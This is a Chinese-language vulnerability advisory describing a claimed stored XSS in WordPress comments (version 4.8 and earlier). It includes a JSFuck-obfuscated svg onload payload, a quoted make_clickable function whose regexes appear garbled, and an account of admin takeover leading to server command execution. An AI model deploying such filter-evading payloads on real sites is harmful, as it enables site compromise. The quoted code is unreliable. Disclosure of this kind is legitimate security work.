漏洞发现者：

SecJack

安全周@上海匡创

漏洞概述及危害

建站程序类型：php+MySql
漏洞类型：储存型XSS
缺陷文件： formatting.php
漏洞参数：<svg onload=alert('1')> ,（进行混淆）

代码如下：

<svg onload=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()>

涉及版本：全版本
危害程度：高危
涉及厂商：WordPress
厂商网站：https://www.wordpress.org/
安装量：非常大
是否拥有源代码分析：有
是否默认配置：是

此漏洞影响WordPress全部版本包括最新版本的WordPress（4.8）都存在评论处的存储型XSS。攻击者可以未授权通过WordPress的评论注入JavaScript攻击代码。

评论被查看的时候，JavaScript就触发了。如果管理员登陆查看评论触发后，可能导致攻击者进入后台通过主题或插件编辑从而命令执行控制整个服务器。

当然，攻击者也可以创建新的管理员，甚至修改管理员密码，等等只要是管理员能在目标系统上做的任何事情。

0x0 代码过滤层

代码路径：

function make_clickable( $text ) {

$r = '';

$textarr = preg_split( '/(<[^<>]+>)/', $text, -1, PREG_SPLIT_DELIM_CAPTURE ); // split out HTML tags

    $nested_code_pre = 0; // Keep trackof how many levels link is nested inside <pre> or <code>

    foreach ( $textarr as $piece ) {

 

if ( preg_match( '|^<code[>]|i', $piece ) || preg_match( '|^<pre[>]|i', $piece ) || preg_match( '|^<script[>]|i',$piece ) || preg_match( '|^<style[>]|i', $piece ) )

$nested_code_pre++;

elseif ( $nested_code_pre && ( '</code>' === strtolower( $piece ) || '</pre>' === strtolower( $piece ) ||'</script>'=== strtolower( $piece ) || '</style>' === strtolower( $piece ) ) )

$nested_code_pre--;

 

if ( $nested_code_pre || empty( $piece ) || ( $piece[0] === '<' && ! preg_match( '|^<*[]{1,20}+://|', $piece ) ) ) {

$r .= $piece;

continue;

}

 

// Long strings might contain expensive edge cases ...

       if ( 10000 < strlen( $piece ) ) {

// ... break it up

           foreach ( _split_str_by_whitespace( $piece, 2100 ) as $chunk ) { // 2100: Extra room for scheme andleading and trailing paretheses

              if ( 2101 < strlen( $chunk ) ) {

$r .= $chunk; // Toobig, no whitespace: bail.

              } else {

$r .= make_clickable( $chunk );

}

}

} else {

$ret = " $piece "; // Pad withwhitespace to simplify the regexes

 

           $url_clickable = '~

([\s(<.,;:!?])                                        # 1: Leading whitespace, or punctuation

(                                                     # 2: URL

[\w]{1,20}+://                                # Scheme andhier-part prefix

                  (?={1,2000})                               # Limit to URLs less than about 2000 characters long

[\w\x80-\xff#%\~/@\[\]*(+=&$-]*+         # Non-punctuation URL character

(?:                                            # Unroll the Loop: Only allow puctuation URL character iffollowed by a non-punctuation URL character

[_f3 .,;:!?)]                            # Punctuation URL character

[\w\x80-\xff#%\~/@\[\]*(+=&$-]++ # Non-punctuation URL character

)*

)

(?)                                                 # 3: Trailing closing parenthesis (forparethesis balancing post processing)

~xS'; // The regex is a non-anchored patternand does not have a single fixed starting character.

// Tell PCRE to spend more time optimizing since, when used on a pageload, it will probably be used several times.

 

           $ret = preg_replace_callback( $url_clickable, '_make_url_clickable_cb', $ret );

 

$ret = preg_replace_callback( '#([>])((www|ftp)[\x80-\xff$%&~/.­;:=,?@+]+)#is','_make_web_ftp_clickable_cb', $ret );

$ret = preg_replace_callback( '#([>])([.0-9a-z_+-]+)@(([0-9a-z-]+)+[0-9a-z]{2,})#i','_make_email_clickable_cb', $ret );

 

$ret = substr( $ret, 1, -1 ); // Remove ourwhitespace padding.

           $r .= $ret;

}

}

 

// Cleanup of accidental links within links

    return preg_replace( '#(<a([]+[^>]+?>|>))<a [^>]+?>([^>]+?)</a></a>#i', "$1$3</a>", $r );

}

0x01测试过程

在以往案例中，被注入的JavaScript代码明显不能在管理员面板触发，所以得在评论处发表评论写入XSS语句。

再审代码的时候我们发现带代码当中并没有针对svg标签混淆之后的元字符进行过滤，

那我们就先去把我们常见的恶意代码进行混淆然后进行测试。